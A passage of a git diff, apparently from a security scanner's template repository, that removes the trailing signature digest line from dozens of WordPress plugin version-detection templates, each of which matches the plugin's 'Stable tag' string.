490a00463044022077180897560184e2ec3d81a202514e5b91fe7eb5706ee42efe63a265d0f8211c022035654a283f369f7e56713d123e3abd7afa68b1b20c11b27ec06c58ed0dd5e2eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 006f65fb72d..2131dbe751b 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b13c8986278d5bcb035740dc60a0bbab3fe112d69e170a85a786300cc3e03e10022100c7a49b51badf2bd45176e7bc68a14bd5478205b6ff4114d9d409a26e2d8e221a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index a4d5a5a71f7..73d644c5e47 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203d767503db09a4887a36ff179ad6ca33117501fdde4f41904c7387d9140dfaff022100ff0b6f3ea9782ebc2a30edbc4b0af7e035220fa95e9b87234011b2cd3cb02ad9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 2f373e6ef6d..7b0593dcb76 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206bcf3c6551ee301ac90ee3c7829b809b582c91b4b87e2b4c36073d6a1e4d9f2d022100d9b25cfd2d4f23cdc6d349239fbf9505b272e159470a2d438f49bbc754e995dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 363952b34fd..6f65d087e49 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ec9f5ed3f3a0c6630e28e30e29789117c1580b83dcc0f44bb1801d7404a167dd022100f314b49bbf2627e6e891b3321c301d1587e9ac76e129abde95855010d51f20a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 74566a93583..783cdd283de 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022064c27a35e77cfabb75d9cdbfd98186929ce6445b2125cf7037b178cf51eb70080220397673e3a36ab642fcc3008cb20132805366fa7ecc88c46bec5982416ef51957:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 0d4a75e3f84..05121854b3e 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205e0a624484fe0fa7cdfce391caff45ddf41d5994148b2f0bad64c2a7872e190a022100f3572dbcf6e00ced5860586e82f0b696b50be84961148b5be8a627cd40fde628:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index f3de01f92f1..72f52edcd44 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f157880ae8e320152a415eae53b23e8f7e66b6e8871834d3dd99246990bea79702210087738a3914322b9ff7677f66474cde8a79ec293153d91e8219900e4569063fd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 848332437b9..4cf45ebd74c 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022078b1c74d9c179952c50b358ab44c888806469332aa7e47c6e0cce69f87e542b202200cb3b079a97abe32dda9889eb94f62f430f99fa48141a5660a3e173695b23da5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 9f56cf6d992..3d6863e074c 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200ac680be6d3608abc546c29710478cf47c73c7fa4a953424e5d79b67cfc66262022100fd455d07782c071f4a605a546350b736be7e8c5fd522aec089d20c9c45079f53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index ea98d783dae..79e2813c5eb 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100afbdb764f4fb77423e1430884373ca9ac61ff78cdf29ea56d18e4e8a072e674f022100bde3bf72ef535a679618fa77411c0649c7bb6a6e61409804c4441571dfd4085f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index 0d4f30ae93b..ab9a0f1ae30 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206f9e310a3e20a8ce8e63e8c2b70465b4eece9e39bd60e5dd3f1fb99cb90a759d0220630988594e81ad4ac6b5111f60409b81f8463947174f31cb93f6c0687a1cbd9c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 8a1ecfefda0..5d3adf7c27a 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220046e928c97a054c611e36a1d63a5da4d137dee1d1a1606a7407e708283e5967c022100e3d048fc32feb15474d86fe1ce45f99fd3cfa6ad2ea398807c80026c6ec11961:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index a5398d363fe..eda1d27f047 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022071f41abf23f9e8e54ad25a2c7caeaa6b09e1366930ccc4427124c8d95a52be1a022100d64d7ca145f9338d2a4d04bc2c2b70876852564dea2fd70f16d6190ad1173cce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index e27ceb1fa72..16dfc8df5f5 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202d2edbd1555944c17b89af8cc09819e9a5c9da2aad41793a8da820212715c89f022100ed17ed3f06771ec9e3387b9056ce07eea10e4fce1a29479e904a32fdeeafc67f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 0fb97f9feff..4b7600ea697 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206ccfb26d689e710333ae287a78f9852eae5293a70f168afded705324574f8943022100b43ba2ecebaa110e7ed8169d925b387d38ede2361b843c3475b854c14dda8152:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 4c9a858488c..2ccd4dbce85 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204a6f98acb769a4e96539ca0db8bc101490fcfba45fdf2ba6c46a6abe9f8d6c48022100fb65c049a2f36f6168f2da2ba2f5e792d9448da88da5f42e4d4852b4a4469bda:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index f2de6448d69..02ceb224d1c 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009629a6778faa007b0004e6ba90e04c73f7cbd926b9bb513d9719287415fc48d5022100e94e287a71450d2f28454e086bb37d93a603710374a29e552fa2fee5ad5e7bdd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index ad9813b1c89..367d587ce2b 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f97e8710d676ae9160e28ef08aef7f488b5ed0bcdb4bf62dce42fe96c6439c7a0220777241e5fca732e47147eb3d73a95fb0c20e41b18e29b0f44fff21a7ac5077d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index f4940fb8b84..feed730ee0c 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205be901f97937b80f842149c97e752689c44425f7d3555dd40bc9185b69f6f47a022050a91237a2d84d4e4e49770a37a7001db0314e9c0d1749c18c7a2a736649453c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 11c76b2bbf4..9b2841e7ca7 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ca92673db6e46aebaaa39f46b39e15bf748fcfb035d374fd20ffa5b377dcb0b80220008b95539085eec642385a5bfc6c83daef7ebe2008311674198b80b7d0bc3d95:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index ca5304e26c9..42be14c5dfe 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a5f598b2a89dd0bb01bb5615010bd1d42db1497737dc8177c087661e1fcfe9fc02210092b31de1a6f44394629a8215fdf95d87532e7705e89f75e2140bd4fe2285b56a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index c000b70da55..4e0cd86c3f7 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201ee77a058cf0610db56decc856b905aa45edc2a41c9b1ad69af78127a4cfbc86022100f6289f9486c28423a28802dda001a32332bd2186b6087ffc524a4eef772228a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 54f59f0dff7..59eadc5e6e7 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200dfa9e916a92e32b1897aa37b9312e69881ad716cfbd1d49efe3634e48991cd0022100ee16719a1dfe4c5260f2e32b7bc71618bfd6edac6179e86499d0d1dbc5847fc4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index cdf4e204dc6..41f7a0075e3 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b748876a2cffb9fc37ad26d802789c6a520a50ccb49ed2bc9c565c970348bc05022100d8426557ea447d9acee1b7dd46bfc774e74f8b705593363c736e9f952772a437:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index d3dc28dd2a0..7e35a3fb4fa 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204e351bd812c0326f0ac6bc149f3fd8ad2923a5bcb0c9a75e6e9848d164876cab022100ca9b07a2ac44542ac88c36ed4ce6ccdbc858557e49cadab28dcefc8537afaf88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 6b0a14526c4..18c2a7586e9 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203eb7a75fb0085504380d4c384e06909bb651c6d9695e12ea0bdd40e9f035e5ea022100d1cdbd41eadc82e7af1752385ea640f8940d5d2d09fe8a698d832e09ae678267:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 4a5f1812195..6bc2aa78f96 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b1da0482d87fcfd4e9440080aa8605a912b4574b70458453d920376c73fdf9c20221008c4fc74b6844c8c5ec208217e6b740446741cc705530bafad1e3fac68f442ac4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 861df0f71c9..a43d3352a27 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202dec65985fbfb9da1033e2d76f9555849a9bbc003f3f6a6fe78de4b016ff03b002204dafc22fa330d29133cb80e168366d786434cf791bc9c8a8fbe144e2a6dafc6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index e56a64d4d7a..e7db9944e45 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022071d04f83ebfaa67eddb4f6b9db3b6d0074748ef05fb7d0687da3d6e17721147e02203895100c1e1492c8b29ede91d278abd746f64049c3c8cea019316680ec715ac8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index cf15e45e293..268bd7b9dfa 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203069d24603d84ebd9296d3113292ba426f06ca190039bb8df86adae68006ea9c022100ffdc45e4b21a165717dab8d9a39b4e2177b2f2dd88236391dcd5d47584a7a878:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index e012e13177d..d7fb2209d19 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100dd7a3ea168f0180134a46eea79628ce4e6209138c9b954a2036b88beeb244d5a022100efa434e54ddb8e02c58966c0000e69b12a8b48483a769ac39938bac6c55c6c25:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 1d6b39a398e..a1641d46328 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008175acbf80e035ccb6259ba23d4c3db3bbf996fdd322092ea13b1e2bd8bf18ec022027076fb7723c38a124e5654bfd8c7a73a767a4398b86fd7bb2a5d040b8e4d09d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 6c92036c8d7..3b6542683c7 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022025ab4b39f115aae8153279a941269230f09455fa6ad470fe9a2721210218c883022100a6cbfb5ded92c1f95dddd778836c5e58acea52191b7948abf62608d556e735d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 4a665b89607..969c280ee17 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b862d04f0a7a16b9fc4ea2df04acd1aed17de491d26d03f1b57bb716ba9a4bad02210080408714475925655c467069c5db6e225d4e1e1bf95e68a4ed229bac41481817:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 863522bf1d0..1c97c422e41 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f0080fc1491182215cc86adb95ca635991a385a8388f1d5ac10c10a1ff4ab76e0220616fa69adc89fd01960d092924b0f354075388e431a81332e1ea662fc408ce10:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 487bd4f9102..7d861cf06a1 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a1958ee9414971993baf64a11212d6a8a5e609481b4a4e6b1f85bcf763b189f1022100ed5067ad4bb7a185ae5c37360cc61fe3ecc47583162675565b47678b72973ea4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index ecd98f6b08c..00eb1e2dfcf 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100da66ca71afe555dab410fe34a0b8e2f7976f2fa3c769f4e238361523d56d95fa02206b3e35ad57a422958daa04a85da73378a3718a6a17f57ff448e31d49d1294567:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index 666b6decf84..f089ee37d31 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100dcc288942f53c8e1ec5a1dfb91c87cbbb8f60e189267ee736e992fa3f738eef30220042ab9be4b520bc411b7a8c195d511b08f80104568ce4b8583bcbfdf0b6f07a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 23694173dfc..492d66db688 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207b82497efafc269d4414f7737d13b0bccdb873c8817d44f6dec61859bfd922100221008aa78d84819dfec246dbfe7a4c619ebdc6f576c5ec65da9b704e9a7eb364748e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index d65055a3e6c..f8903fa3dbb 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210085b4fd770dfa661f81bfc77fcf505342391e6d7b0721aca5e6399f04542dd6fc022100951ce549addcd1a6dcdf2bfb699591ede6ab07a7c12028e79e4058322e13ced1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 4b7f05a78b8..ae2451ca381 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200e566aa07fa0d3703964b107cd0bccd39761853a2cccbea866b05ae3b959cc100220665b95c2725d338737ce0484399b6d5b799ae75c2908d3952db1b63463d9fdd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 5c51a925b05..dcc61d1255b 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205caec4b547bc85e47b2909a4ca8cd1dfcdc3fdcdfacfb29e3e23d0c8d77fe8fd022100a3ba8e3306207aa8ca6a977b0061de572a1f1218a8dad9fe1f41639951ea18bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 40fdd8aa1d0..d1d2c1c1d00 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ab33ab960bd254b43988d4eb516c303c728df599bd38144883ccef0335163648022100a645d4bb15d29e4532399d987839a2ded8c914c321e6bc0324669458fbb1b604:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 9709ebf1e5f..5f5e8afed51 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022053de2a3f3609d09f17b179b01dfe45509cf0ba754f73c16ffd5c0b0ea6c5f049022100896101016b646a73527ea408edc09bbd55898ed7b8c72cd0c507f1ceb6956b66:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index c9822ca1a3b..d15634bb2b1 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022049a36f46d127c5aaa591e63f1eab1b173d9099b58a680da2198b5260990640ab022100bb6776c205fc892c6c17d973734315d556ded32932f5ee253851b5042a559730:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 76af04fb155..7da04be5d3e 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e0ea23afa4741fd3efc7217774934521786c197c68a97d821c6a0a0231fbce5602204e439c844ab619fdec229ca7a9c5ef82a2f730af81144b7e10361f80063ef00f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 35fc8a96786..a79253cec50 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009b14a708aa3410fb1dcfd245e8faf2bde934a440841e3b7fcad9f42be7e9c058022100d48eb97f15c1c638bdbf62c186c3560c68b8f37db70f24d3ef6a8e0f3cbb1b40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 